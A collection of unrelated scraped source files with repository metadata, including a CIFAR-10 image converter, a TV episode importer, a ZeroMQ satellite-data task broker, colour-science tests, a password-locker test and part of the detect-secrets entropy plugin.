return img, label_n
def check_data_dir(path_data):
if not os.path.exists(path_data):
print("文件夹不存在,请检查数据是否存放到data_dir变量:{}".format(path_data))
if __name__ == '__main__':
BASE_DIR = os.path.dirname(__file__)
cifar_dir = r"G:\deep_learning_data\cifar10" # 数据目录
data_dir = os.path.join(cifar_dir, "cifar-10-batches-py") # 源数据目录
check_data_dir(data_dir)
train_o_dir = os.path.join(cifar_dir, "cifar10_train") # 输出的目录
test_o_dir = os.path.join(cifar_dir, "cifar10_test")
# train data
for j in range(1, 6):
data_path = os.path.join(data_dir, "data_batch_" + str(j)) # data_batch_12345
train_data = unpickle(data_path)
print(data_path + " is loading...")
for i in range(0, 10000):
# 解析图片及标签
img, label_num = pasre_pickle_img(train_data)
# 创建文件夹
o_dir = os.path.join(train_o_dir, label_num)
my_mkdir(o_dir)
# 保存图片
img_name = label_num + '_' + str(i + (j - 1)*10000) + '.png'
img_path = os.path.join(o_dir, img_name)
imwrite(img_path, img)
print(data_path + " loaded.")
# test data
test_data_path = os.path.join(data_dir, "test_batch")
test_data = unpickle(test_data_path)
for i in range(0, 10000):
# 解析图片及标签
img, label_num = pasre_pickle_img(test_data)
# 创建文件夹
o_dir = os.path.join(test_o_dir, label_num)
my_mkdir(o_dir)
# 保存图片
img_name = label_num + '_' + str(i) + '.png'
img_path = os.path.join(o_dir, img_name)
imwrite(img_path, img)
print("done.")
| 28.855422
| 87
| 0.598747
|
4a0f3ac0bb26f645cb1b9e2d08a44d8572f220e4
| 10,725
|
py
|
Python
|
humblebee/importer.py
|
steinitzu/humblebee
|
7c6e9434669640b38953bacf9fd167ce82a3cbba
|
[
"MIT"
] | 9
|
2019-10-25T19:05:19.000Z
|
2021-11-27T08:36:00.000Z
|
humblebee/importer.py
|
steinitzu/humblebee
|
7c6e9434669640b38953bacf9fd167ce82a3cbba
|
[
"MIT"
] | null | null | null |
humblebee/importer.py
|
steinitzu/humblebee
|
7c6e9434669640b38953bacf9fd167ce82a3cbba
|
[
"MIT"
] | 34
|
2017-10-22T21:50:24.000Z
|
2022-03-28T01:34:30.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging, os, time, shelve
from glob import glob
from datetime import datetime
from send2trash import send2trash
from .dbguy import TVDatabase
from .renaming import Renamer, SymlinkRenamer, make_unknown_dir
from .parser import reverse_parse_episode
from .texceptions import SeasonNotFoundError
from .texceptions import EpisodeNotFoundError
from .texceptions import IncompleteEpisodeError
from .texceptions import ShowNotFoundError
from .texceptions import InvalidDirectoryError
from .texceptions import RARError
from .tvdbwrapper import lookup
from .util import split_root_dir
from .util import normpath
from .util import bytestring_path
from .util import soft_unlink
from .util import syspath
from .util import safe_make_dirs
from .util import make_symlink
from .util import samefile
from .dirscanner import get_episodes
from .dirscanner import is_rar
from .dirscanner import get_file_from_single_ep_dir
from .unrarman import unrar_file
from .quality import quality_battle
from .quality import MediaInfoError
from .util import get_prog_home_dir
from . import appconfig as cfg
log = logging.getLogger('humblebee')
class Importer(object):
lookup_error = (
ShowNotFoundError,
SeasonNotFoundError,
EpisodeNotFoundError,
IncompleteEpisodeError
)
def __init__(self, rootdir, destdir, **kwargs):
self.db = TVDatabase(rootdir)
self.rootdir = self.db.directory
self._cleardb = cfg.get('database', 'clear', bool)
self._update = cfg.get('database', 'update', bool)
self._brute = cfg.get('importer', 'brute', bool)
self._unrar = cfg.get('importer', 'unrar', bool)
self._forcerename = cfg.get('importer', 'force-rename', bool)
self._rename = cfg.get('importer', 'rename-files', bool)
self._symlinks = cfg.get('importer', 'symlinks', bool)
ns = cfg.get('importer', 'naming-scheme')
if cfg.get('importer', 'symlinks', bool):
self.renamer = SymlinkRenamer(self.rootdir, destdir, ns)
elif cfg.get('importer', 'rename-files', bool):
self.renamer = Renamer(self.rootdir, destdir, ns)
else:
self.renamer = None
if self._cleardb:
soft_unlink(self._last_stat_path())
self.last_stat = shelve.open(self._last_stat_path())
self.failed_lookup = []
self.added_to_db = []
self.success_lookup = []
self.extracted_rar = []
self.failed_rar = []
def do_import(self):
if self.db.db_file_exists():
if self._cleardb:
self.db.create_database(force=True)
else:
self._cleardb = True #no existing db means "first" import
self.db.create_database()
def get_ep_by_id(id_):
w = 'WHERE id = ?'
p = (id_,)
return self.db.get_episodes(w, p).next()
log.info('Cleaning up')
c = self.dust_database()
for ep in get_episodes(self.rootdir):
if self.should_import(ep):
res = self.import_episode(ep)
if res and self.renamer:
ep = get_ep_by_id(res)
self.renamer.move_episode(ep, force=self._forcerename)
self.last_stat[ep.path('db')] = round(os.path.getmtime(ep.path()),2)
self.last_stat.sync()
if self._symlinks:
make_unknown_dir(self.db, self.renamer.destdir)
log.info('Cleaning up')
cc = self.dust_database()
c = c+cc
log.info('Deleted %s zombie eps from database', c)
log.info('Failed lookup count: %s', len(self.failed_lookup))
log.info('Added to db count: %s', len(self.added_to_db))
log.info('Succesful lookup count: %s', len(self.success_lookup))
log.info('extracted rar count: %s', len(self.extracted_rar))
log.info('failed rar count: %s', len(self.failed_rar))
self.write_stats()
def import_episode(self, ep):
"""
Import a single episode.
Lookup info, unrar, compare with existing ep, upsert to db.
Actions performed depend on cfg options.
Returns ep id or None
"""
def upsert(epi):
idd = self.db.upsert_episode(epi)
self.added_to_db.append(epi)
return idd
try:
ep = self.fill_episode(ep)
except self.lookup_error as e:
self.failed_lookup.append(ep)
self.db.add_unparsed_child(ep.path('rel'))
return
else:
self.success_lookup.append(ep)
if self._unrar and is_rar(ep.path()):
ep = self.unrar_episode(ep)
idindb = self.db.episode_exists(ep)
if idindb and self._brute:
return upsert(ep)
elif idindb:
better = self.get_better(ep)
if better is ep:
return upsert(better)
else:
return
else:
return upsert(ep)
def get_better(self, ep):
"""
Check if given `ep` is better quality than
one with same id in db.
Returns True or False accordingly.
"""
oldep = self.db.get_episodes('WHERE id=?', params=(ep['id'],)).next()
if samefile(oldep.path(), ep.path()):
return
log.info(
'Found duplicates. Original: "%s". Contender: "%s".',
oldep.path(),
ep.path()
)
if not os.path.exists(oldep.path()):
log.info(
'Original: "%s" does not exist anymore".'\
+' Replacing with contender: "%s".',
oldep.path(),
ep.path()
)
return ep
if is_rar(ep.path()) or is_rar(oldep.path()):
#can't battle rars
return
#let's fight
try:
return quality_battle(ep, oldep, self.db.directory)
except MediaInfoError as e:
log.warning(e.message)
return
def should_import(self, ep):
"""
Decide if given episode should be scraped
or not.
"""
if self._cleardb:
return True #always scrape when clearing
p = ep.path('db')
newmt = round(os.path.getmtime(ep.path()), 2)
if self.last_stat.has_key(p):
log.debug('"%s" was scraped last run.', p)
oldmt = round(self.last_stat[p],2)
if newmt > oldmt:
log.debug('"%s" changed since last run.', p)
log.debug('newmt: %s, oldmt: %s', newmt,oldmt)
return True
elif self._update:
return False #no change, update, no scrape
else:
return True
else:
return True #not been scraped before, do it
def fill_episode(self, ep):
"""
Fill the given `ep` with info from tvdb and return it.
Raises `lookup_error` if not possible.
"""
if not ep.is_fully_parsed():
ep = reverse_parse_episode(
ep.path(), self.rootdir
)
try:
return lookup(ep)
except self.lookup_error as e:
log.debug(e.message)
ep = reverse_parse_episode(ep.path(), self.rootdir)
return lookup(ep)
def unrar_episode(self, ep, out_dir=None):
"""
unrar_episode(Episode)
Errors are swallowed.
"""
p = ep.path()
if not os.path.isdir(p):
raise InvalidDirectoryError(
'Episode path must be a directory. "%s" is not.' % p
)
log.info('Extracting "%s" from rar files.', p)
try:
unrar_file(p, out_dir=out_dir)
except RARError as e:
log.debug('RARError: %s', e.message)
self.failed_rar.append(ep)
return ep
#get new path to episode
ep['file_path'] = get_file_from_single_ep_dir(p)
delr = cfg.get('importer', 'delete-rar', bool)
if delr:
self.trash_rars_in_dir(p)
self.extracted_rar.append(ep)
return ep
def trash_rars_in_dir(self, directory):
"""
trash_rars_in_dir(directory)
Send rar files in given directory to trash.
"""
log.info('Sending rar files in "%s" to trash.', directory)
rnfiles = glob(
os.path.join(directory, '*.r[0-9][0-9]'))
rarfiles = glob(
os.path.join(directory, '*.rar'))
for f in rnfiles+rarfiles:
send2trash(f)
def _last_stat_path(self):
return normpath(os.path.join(
self.rootdir,
cfg.get('database', 'resume-data-filename')
))
def dust_database(self):
"""
Remove entries from database for non-existing paths.
Run after import.
"""
c = 0
for ep in self.db.get_episodes():
if not os.path.exists(ep.path()):
c+=1
self.db.delete_episode(ep['id'])
return c
def write_stats(self):
"""
Write some stats for this import.
"""
statdir = os.path.join(
get_prog_home_dir('humblebee'),
'stats'
)
safe_make_dirs(statdir)
sfile = os.path.join(
statdir,
str(int(time.time()))
)
f = open(sfile, 'w')
f.write(
'\nimport at: %s\n----------------\n' % (
str(datetime.now()))
)
f.write(
'\nsuccess lookup count: %s\n----------------\n' % len(self.success_lookup)
)
f.write('\n'.join([e.path() for e in self.success_lookup]))
f.write(
'\nfailed lookup count: %s\n----------------\n' % len(self.failed_lookup)
)
f.write('\n'.join([e.path() for e in self.failed_lookup]))
f.write(
'\nadded to db count: %s\n----------------\n' % len(self.added_to_db)
)
f.write('\n'.join([e.path() for e in self.added_to_db]))
f.write(
'\nextracted from rar files count: %s\n----------------\n' % len(self.extracted_rar)
)
f.write('\n'.join([e.path() for e in self.extracted_rar]))
f.write(
'\nfailed rar files count: %s\n----------------\n' % len(self.failed_rar)
)
f.write('\n'.join([e.path() for e in self.failed_rar]))
f.close()
| 33.939873
| 96
| 0.549091
|
4a0f3b195e7140acd5097269a6100ac49223480c
| 6,151
|
py
|
Python
|
avoviirscollector/task_broker.py
|
tparker-usgs/rsCollectors
|
28c3f2ee43c58f3edf2e4ffcf54cce3d912ef72b
|
[
"CC0-1.0"
] | null | null | null |
avoviirscollector/task_broker.py
|
tparker-usgs/rsCollectors
|
28c3f2ee43c58f3edf2e4ffcf54cce3d912ef72b
|
[
"CC0-1.0"
] | 1
|
2019-05-03T00:19:15.000Z
|
2019-05-03T00:19:15.000Z
|
avoviirscollector/task_broker.py
|
tparker-usgs/rsCollectors
|
28c3f2ee43c58f3edf2e4ffcf54cce3d912ef72b
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# I waive copyright and related rights in the this work worldwide
# through the CC0 1.0 Universal public domain dedication.
# https://creativecommons.org/publicdomain/zero/1.0/legalcode
# Author(s):
# Tom Parker <tparker@usgs.gov>
""" Present a consolodated event stream from messages gathered from individual
segment_gatherer processes.
"""
import collections
import threading
import signal
import time
from datetime import timedelta
import zmq
from posttroll.subscriber import Subscribe
import tomputils.util as tutil
from avoviirscollector.viirs import product_key, products, product
from json.decoder import JSONDecodeError
TOPIC = "pytroll://AVO/viirs/granule"
UPDATER_ADDRESS = "tcp://*:19191"
TASKER_ADDRESS = "tcp://*:19091"
ORBIT_SLACK = timedelta(minutes=30)
class ClientTask(threading.Thread):
def __init__(self, msgs):
threading.Thread.__init__(self)
self.msgs = msgs
def run(self):
with Subscribe("", TOPIC, True) as sub:
for new_msg in sub.recv():
try:
logger.debug("received message (%d)", len(self.msgs))
queue_msg(self.msgs, new_msg)
except Exception:
logger.exception("Can't queue message.")
class Server(threading.Thread):
def __init__(self, context, msgs, socket_type, address):
threading.Thread.__init__(self)
self.msgs = msgs
self.socket = context.socket(socket_type)
self.socket.setsockopt(zmq.TCP_KEEPALIVE, 1)
self.socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, 60)
self.socket.setsockopt(zmq.TCP_KEEPALIVE_CNT, 20)
self.socket.setsockopt(zmq.TCP_KEEPALIVE_INTVL, 60)
self.socket.bind(address)
class Updater(Server):
def __init__(self, context, msgs):
Server.__init__(self, context, msgs, zmq.PUB, UPDATER_ADDRESS)
def run(self):
while True:
update = {}
update["queue length"] = len(self.msgs)
waiting_products = products(self.msgs.keys())
unique_products = list(set(waiting_products))
update["products waiting"] = unique_products
self.socket.send_json(update)
logger.debug("Updater: queue length:: %d", update["queue length"])
time.sleep(1)
class Tasker(threading.Thread):
def __init__(self, context, msgs):
Server.__init__(self, context, msgs, zmq.REP, TASKER_ADDRESS)
def get_message(self, request):
with msgs_lock:
msg = None
waiting_tasks = collections.OrderedDict()
while self.msgs:
(key, msg_list) = self.msgs.popitem(last=False)
if product(key) in request["desired products"]:
if "just testing" in request and request["just testing"]:
msg = msg_list[-1]
else:
msg = msg_list.pop()
if msg_list:
logger.debug("requeing {} items".format(len(msg_list)))
waiting_tasks[key] = msg_list
break
else:
logger.debug(
"skipping wrong product: %s :: %s",
product(key),
request["desired products"],
)
waiting_tasks[key] = msg_list
for key, val in waiting_tasks.items():
self.msgs[key] = val
self.msgs.move_to_end(key, last=False)
if msg is None:
raise KeyError("No matching tasks waiting")
return msg
def run(self):
while True:
logger.debug("waiting for request")
try:
request = self.socket.recv_json()
logger.debug("received request: %s", request)
except JSONDecodeError:
logger.exception("Bad reqeust from client")
pass
try:
msg = self.get_message(request)
self.socket.send(bytes(msg.encode(), "UTF-8"))
logger.debug("sent task")
except KeyError:
self.socket.send(b"")
logger.debug("sent empty message")
def queue_msg(msgs, new_msg):
key = product_key(new_msg)
with msgs_lock:
if key not in msgs:
logger.debug("Adding new key %s", key)
msgs[key] = []
new_data = new_msg.data
for msg in msgs[key]:
queued_data = msg.data
time_diff = abs(queued_data["start_time"] - new_data["start_time"])
if time_diff < ORBIT_SLACK:
logger.debug("updating messge %s", key)
queued_data["start_time"] = min(
queued_data["start_time"], new_data["start_time"]
)
queued_data["start_date"] = min(
queued_data["start_date"], new_data["start_date"]
)
queued_data["end_time"] = max(
queued_data["end_time"], new_data["end_time"]
)
queued_data["dataset"] += new_data["dataset"]
new_msg = None
break
if new_msg:
msgs[key].append(new_msg)
def main():
# let ctrl-c work as it should.
signal.signal(signal.SIGINT, signal.SIG_DFL)
global logger
logger = tutil.setup_logging("msg_broker errors")
global msgs_lock
msgs_lock = threading.Lock()
logger.debug("Current libzmq version is %s" % zmq.zmq_version())
logger.debug("Current pyzmq version is %s" % zmq.__version__)
context = zmq.Context()
msgs = collections.OrderedDict()
client = ClientTask(msgs)
client.start()
logger.info("client started")
tasker = Tasker(context, msgs)
tasker.start()
logger.info("tasker started")
updater = Updater(context, msgs)
updater.start()
logger.info("updater started")
client.join()
tasker.join()
updater.join()
if __name__ == "__main__":
main()
| 32.204188
| 79
| 0.577142
|
4a0f3c21aa80c62ce97077ed3717d9b5a9f3cdcf
| 1,442
|
py
|
Python
|
examples/shout-and-echo.py
|
AnotherKamila/distributed-algorithms-emulator
|
0abbe91108551651ffee712c93499bc89a3adc27
|
[
"MIT"
] | null | null | null |
examples/shout-and-echo.py
|
AnotherKamila/distributed-algorithms-emulator
|
0abbe91108551651ffee712c93499bc89a3adc27
|
[
"MIT"
] | null | null | null |
examples/shout-and-echo.py
|
AnotherKamila/distributed-algorithms-emulator
|
0abbe91108551651ffee712c93499bc89a3adc27
|
[
"MIT"
] | null | null | null |
"""Implements a shout-and-echo algorithm on any topology."""
from da import Node, Network
import topo
class ShoutAndEcho(Node):
def run(self):
marked_edges = [ False for e in range(self.deg) ]
first_from = None
if 'shout' in self.data:
self.data['msg'] = self.data['shout']
for p in range(self.deg): self.send(p, ('shout', self.data['msg']))
while True:
if all(marked_edges):
if 'shout' not in self.data:
self.send(first_from, ('echo', self.data['msg']))
return
p, m = self.recv()
if m[0] == 'echo': marked_edges[p] = True
if m[0] == 'shout':
if 'msg' not in self.data:
self.data['msg'] = m[1]
first_from = p
marked_edges[p] = True
for p in range(self.deg):
if not marked_edges[p]:
self.send(p, ('shout', self.data['msg']))
else:
self.send(p, ('echo', self.data['msg']))
def run(n):
msg = 'test'
t = topo.random(n, n//2)
net = Network(ShoutAndEcho, t)
net.nodes[0].data['shout'] = msg
net.run()
# check that it worked
for n in net.nodes:
if n.data['msg'] != msg:
n.log("did not get the message!")
if __name__ == '__main__':
run(47)
| 30.680851
| 79
| 0.476422
|
4a0f3f5bac36bae8a389282decc2f03f0155d202
| 5,148
|
py
|
Python
|
colour/graph/tests/test_conversion.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | 1
|
2022-02-12T06:28:15.000Z
|
2022-02-12T06:28:15.000Z
|
colour/graph/tests/test_conversion.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
colour/graph/tests/test_conversion.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Defines the unit tests for the :mod:`colour.graph.conversion` module.
"""
import numpy as np
import unittest
from colour.characterisation import SDS_COLOURCHECKERS
from colour.colorimetry import CCS_ILLUMINANTS, SDS_ILLUMINANTS
from colour.models import COLOURSPACE_MODELS, RGB_COLOURSPACE_ACES2065_1
from colour.graph import describe_conversion_path, convert
__author__ = "Colour Developers"
__copyright__ = "Copyright (C) 2013-2022 - Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"TestDescribeConversionPath",
"TestConvert",
]
class TestDescribeConversionPath(unittest.TestCase):
"""
Defines :func:`colour.graph.conversion.describe_conversion_path` definition
unit tests methods.
"""
def test_describe_conversion_path(self):
"""
Tests :func:`colour.graph.conversion.describe_conversion_path`
definition.
"""
describe_conversion_path("Spectral Distribution", "sRGB")
describe_conversion_path("Spectral Distribution", "sRGB", mode="Long")
describe_conversion_path(
"Spectral Distribution",
"sRGB",
mode="Extended",
sd_to_XYZ={
"illuminant": SDS_ILLUMINANTS["FL2"],
"return": np.array([0.47924575, 0.31676968, 0.17362725]),
},
)
class TestConvert(unittest.TestCase):
"""
Defines :func:`colour.graph.conversion.convert` definition unit tests
methods.
"""
def test_convert(self):
"""
Tests :func:`colour.graph.conversion.convert` definition.
"""
RGB_a = convert(
SDS_COLOURCHECKERS["ColorChecker N Ohta"]["dark skin"],
"Spectral Distribution",
"sRGB",
)
np.testing.assert_almost_equal(
RGB_a, np.array([0.45675795, 0.30986982, 0.24861924]), decimal=7
)
Jpapbp = convert(RGB_a, "Output-Referred RGB", "CAM16UCS")
np.testing.assert_almost_equal(
Jpapbp, np.array([0.39994810, 0.09206557, 0.08127526]), decimal=7
)
RGB_b = convert(
Jpapbp, "CAM16UCS", "sRGB", verbose={"mode": "Extended"}
)
# NOTE: The "CIE XYZ" tristimulus values to "sRGB" matrix is given
# rounded at 4 decimals as per "IEC 61966-2-1:1999" and thus preventing
# exact roundtrip.
np.testing.assert_allclose(RGB_a, RGB_b, rtol=1e-5, atol=1e-5)
np.testing.assert_almost_equal(
convert("#808080", "Hexadecimal", "Scene-Referred RGB"),
np.array([0.21586050, 0.21586050, 0.21586050]),
decimal=7,
)
self.assertAlmostEqual(
convert("#808080", "Hexadecimal", "RGB Luminance"),
0.21586050,
places=7,
)
np.testing.assert_almost_equal(
convert(
convert(
np.array([0.5, 0.5, 0.5]),
"Output-Referred RGB",
"Scene-Referred RGB",
),
"RGB",
"YCbCr",
),
np.array([0.49215686, 0.50196078, 0.50196078]),
decimal=7,
)
np.testing.assert_almost_equal(
convert(
RGB_a,
"RGB",
"Scene-Referred RGB",
RGB_to_RGB={"output_colourspace": RGB_COLOURSPACE_ACES2065_1},
),
np.array([0.36364180, 0.31715308, 0.25888531]),
decimal=7,
)
# Consistency check to verify that all the colour models are properly
# named in the graph:
for model in COLOURSPACE_MODELS:
convert(
np.array([0.20654008, 0.12197225, 0.05136952]),
"CIE XYZ",
model,
)
def test_convert_direct_keyword_argument_passing(self):
"""
Tests :func:`colour.graph.conversion.convert` definition behaviour when
direct keyword arguments are passed.
"""
a = np.array([0.20654008, 0.12197225, 0.05136952])
illuminant = CCS_ILLUMINANTS["CIE 1931 2 Degree Standard Observer"][
"D50"
]
np.testing.assert_almost_equal(
convert(
a, "CIE XYZ", "CIE xyY", XYZ_to_xyY={"illuminant": illuminant}
),
convert(a, "CIE XYZ", "CIE xyY", illuminant=illuminant),
decimal=7,
)
# Illuminant "ndarray" is converted to tuple here so that it can
# be hashed by the "sd_to_XYZ" definition, this should never occur
# in practical application.
self.assertRaises(
AttributeError,
lambda: convert(
SDS_COLOURCHECKERS["ColorChecker N Ohta"]["dark skin"],
"Spectral Distribution",
"sRGB",
illuminant=tuple(illuminant),
),
)
if __name__ == "__main__":
unittest.main()
| 31.012048
| 79
| 0.577894
|
4a0f3fccd57866228fd8e5e02091d330846f318e
| 366
|
py
|
Python
|
Array/Leetcode 220. Contains Duplicate III.py
|
kaizhengny/LeetCode
|
67d64536ab80f4966699fe7460d165f2a98d6a82
|
[
"MIT"
] | 31
|
2020-06-23T00:40:04.000Z
|
2022-01-08T11:06:24.000Z
|
Array/Leetcode 220. Contains Duplicate III.py
|
kaizhengny/LeetCode
|
67d64536ab80f4966699fe7460d165f2a98d6a82
|
[
"MIT"
] | null | null | null |
Array/Leetcode 220. Contains Duplicate III.py
|
kaizhengny/LeetCode
|
67d64536ab80f4966699fe7460d165f2a98d6a82
|
[
"MIT"
] | 7
|
2020-04-30T08:46:03.000Z
|
2021-08-28T16:25:54.000Z
|
class Solution:
def containsNearbyAlmostDuplicate(self, nums: List[int], k: int, t: int) -> bool:
if t == 0 and len(set(nums)) == len(nums):
return False
for i in range(len(nums)):
for j in range(i+1,min(i+k+1,len(nums))):
if abs(nums[j] - nums[i]) <=t:
return True
return False
| 40.666667
| 85
| 0.513661
|
4a0f4091907d85c906edd6ea1fbb2f107a6db65b
| 1,197
|
py
|
Python
|
python/Chapter3/Solutions/Exercise3_2.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
python/Chapter3/Solutions/Exercise3_2.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
python/Chapter3/Solutions/Exercise3_2.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
import shelve
#'ID', 'Name', 'HireDate', 'Grade', 'ManagerID'
employees = [
['1','John Brown', '2006-02-23', 'Foreman', ''],
['2','Fred Smith', '2014-04-03', 'Laborer', '1'],
['3','Anne Jones', '2009-06-17', 'Laborer', '1'],
]
#'Grade','Amount'
salaries = [
['Foreman', 60000],
['Laborer', 30000]
]
def createDB(data, shelfname):
try:
shelf = shelve.open(shelfname,'c')
for datum in data:
shelf[datum[0]] = datum
finally:
shelf.close()
def readDB(shelfname):
try:
shelf = shelve.open(shelfname,'r')
return [shelf[key] for key in shelf]
finally:
shelf.close()
def with_salary(n):
grades = [salary[0] for salary in readDB('salaryshelf') if salary[1] >= n]
for staff in readDB('employeeshelf'):
if staff[3] in grades:
yield staff
def main():
print('Creating data files...')
createDB(employees, 'employeeshelf')
createDB(salaries, 'salaryshelf')
print('Staff paid more than 30000:')
for staff in with_salary(30000):
print(staff[1])
print('Staff paid more than 50000:')
for staff in with_salary(50000):
print(staff[1])
if __name__ == "__main__": main()
| 23.94
| 78
| 0.597327
|
4a0f40d03c594c93d1243115f4f226428c9840e0
| 1,693
|
py
|
Python
|
gamestonk_terminal/options/volume_helper.py
|
khuang110/GamestonkTerminal
|
98ac22eef1b61de73b4056debc128b66f520ffb9
|
[
"MIT"
] | 1
|
2021-12-17T19:25:12.000Z
|
2021-12-17T19:25:12.000Z
|
gamestonk_terminal/options/volume_helper.py
|
lolrenx/GamestonkTerminal
|
eb2b0d766bf1b6bb8656d6733083962efb152fe2
|
[
"MIT"
] | null | null | null |
gamestonk_terminal/options/volume_helper.py
|
lolrenx/GamestonkTerminal
|
eb2b0d766bf1b6bb8656d6733083962efb152fe2
|
[
"MIT"
] | null | null | null |
"""Functions for analyzing options data"""
__docformat__ = "numpy"
from typing import Union
import pandas as pd
import numpy as np
def get_loss_at_strike(
strike: Union[int, float], chain: pd.DataFrame
) -> Union[int, float]:
"""
Function to get the loss at the given expiry
Parameters
----------
strike: Union[int,float]
Value to calculate total loss at
chain: Dataframe:
Dataframe containing at least strike and openInterest
Returns
-------
loss: Union[float,int]
Total loss
"""
itm_calls = chain[chain.index < strike][["OI_call"]]
itm_calls["loss"] = (strike - itm_calls.index) * itm_calls["OI_call"]
call_loss = itm_calls["loss"].sum()
# The *-1 below is due to a sign change for plotting in the _view code
itm_puts = chain[chain.index > strike][["OI_put"]]
itm_puts["loss"] = (itm_puts.index - strike) * itm_puts["OI_put"] * -1
put_loss = itm_puts.loss.sum()
loss = call_loss + put_loss
return loss
def get_max_pain(chain: pd.DataFrame) -> Union[int, float]:
"""
Returns the max pain for a given call/put dataframe
Parameters
----------
chain: DataFrame
Dataframe to calculate value from
Returns
-------
max_pain :
Max pain value
"""
strikes = np.array(chain.index)
if ("OI_call" not in chain.columns) or ("OI_put" not in chain.columns):
print("Incorrect columns. Unable to parse max pain")
return np.nan
loss = []
for price_at_exp in strikes:
loss.append(get_loss_at_strike(price_at_exp, chain))
chain["loss"] = loss
max_pain = chain["loss"].idxmin()
return max_pain
| 26.453125
| 75
| 0.632605
|
4a0f42724b780ddeed157440d9a10f316ff1d39f
| 3,019
|
py
|
Python
|
credentials_test.py
|
Chebichii-Lab/password-locker
|
4ec057acb4f1255ac8855462799e38108d463e60
|
[
"MIT"
] | null | null | null |
credentials_test.py
|
Chebichii-Lab/password-locker
|
4ec057acb4f1255ac8855462799e38108d463e60
|
[
"MIT"
] | null | null | null |
credentials_test.py
|
Chebichii-Lab/password-locker
|
4ec057acb4f1255ac8855462799e38108d463e60
|
[
"MIT"
] | null | null | null |
import unittest
from credentials import Credentials # importing the credentials class
class TestCredentials(unittest.TestCase):
'''
test class defines test cases for the credentials
'''
def setUp(self):
'''
set up method runs before other cases
'''
self.new_credentials = Credentials("You Tube","natcase","chebichii1")
def test_init(self):
self.assertEqual(self.new_credentials.account,"You Tube")
self.assertEqual(self.new_credentials.username,"natcase")
self.assertEqual(self.new_credentials.password,"chebichii1")
def test_save_credentials(self):
'''
test case to test if credentials is saved into the credentials list
'''
self.new_credentials.save_credentials() # saving new credentails
self.assertEqual(len(Credentials.credentials_list), 1)
def tearDown(self):
'''
tear down method does clean up after each test case has been run
'''
Credentials.credentials_list =[]
def test_save_multiple_credentials(self):
'''
test to check if we can save multiple credentials
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("Twitter","papa","guks001")
test_credentials.save_credentials()
self.assertEqual(len(Credentials.credentials_list), 2)
def test_del_credentials(self):
'''
test to see if we can remove a credential from our credentials list
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("Twitter","papa","guks001")
test_credentials.save_credentials()
self.new_credentials.del_credentials() # deleting credentials object
self.assertEqual(len(Credentials.credentials_list), 1)
def test_find_credentials_by_username(self):
'''
test to see if we can find credentials by username and display information
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("Twitter","papa","guks001") # new credential
test_credentials.save_credentials()
found_credentials = Credentials.find_by_username("papa")
self.assertEqual(found_credentials.password, test_credentials.password)
def test_display_all_credentials(self):
'''
method that returns a list of all credentials saved
'''
self.assertEqual(Credentials.display_credentials(),Credentials.credentials_list)
def test_exists_credentials(self):
'''
test to check if we can return a Boolean if we cannot find the credentials.
'''
self.new_credential.save_credential()
test_credentials = Credentials("Twitter","papa", "guks001") # new contact
test_credentials.save_credentials()
credentials_exists = Credentials.credentials_exist("papa")
self.assertTrue(credentials_exists)
if __name__ == '__main__':
unittest.main()
| 35.940476
| 89
| 0.675389
|
4a0f42cbbd28b92347e0d415783d14bf591cab42
| 15,172
|
py
|
Python
|
detect_secrets/plugins/high_entropy_strings.py
|
digjanaik/detect-secrets
|
624024ad5fd8a608e09ed719e5edab6ca95ef47e
|
[
"Apache-2.0"
] | null | null | null |
detect_secrets/plugins/high_entropy_strings.py
|
digjanaik/detect-secrets
|
624024ad5fd8a608e09ed719e5edab6ca95ef47e
|
[
"Apache-2.0"
] | 1
|
2020-08-12T21:57:16.000Z
|
2020-08-12T21:57:16.000Z
|
detect_secrets/plugins/high_entropy_strings.py
|
digjanaik/detect-secrets
|
624024ad5fd8a608e09ed719e5edab6ca95ef47e
|
[
"Apache-2.0"
] | null | null | null |
import base64
import configparser
import math
import re
import string
from abc import ABCMeta
from abc import abstractmethod
from contextlib import contextmanager
import yaml
from detect_secrets.core.potential_secret import PotentialSecret
from detect_secrets.plugins.base import BasePlugin
from detect_secrets.plugins.base import classproperty
from detect_secrets.plugins.common.filetype import determine_file_type
from detect_secrets.plugins.common.filetype import FileType
from detect_secrets.plugins.common.filters import get_aho_corasick_helper
from detect_secrets.plugins.common.filters import is_false_positive_with_line_context
from detect_secrets.plugins.common.filters import is_potential_uuid
from detect_secrets.plugins.common.filters import is_sequential_string
from detect_secrets.plugins.common.ini_file_parser import IniFileParser
from detect_secrets.plugins.common.yaml_file_parser import YamlFileParser
class HighEntropyStringsPlugin(BasePlugin):
"""Base class for string pattern matching"""
__metaclass__ = ABCMeta
def __init__(self, charset, limit, exclude_lines_regex, automaton, *args):
if limit < 0 or limit > 8:
raise ValueError(
'The limit set for HighEntropyStrings must be between 0.0 and 8.0',
)
self.charset = charset
self.entropy_limit = limit
self.regex = re.compile(r'([\'"])([%s]+)(\1)' % charset)
false_positive_heuristics = [
get_aho_corasick_helper(automaton),
is_sequential_string,
is_potential_uuid,
]
super(HighEntropyStringsPlugin, self).__init__(
exclude_lines_regex=exclude_lines_regex,
false_positive_heuristics=false_positive_heuristics,
)
def analyze(self, file, filename):
file_type_analyzers = (
(self._analyze_ini_file(), configparser.Error),
(self._analyze_yaml_file, yaml.YAMLError),
(super(HighEntropyStringsPlugin, self).analyze, Exception),
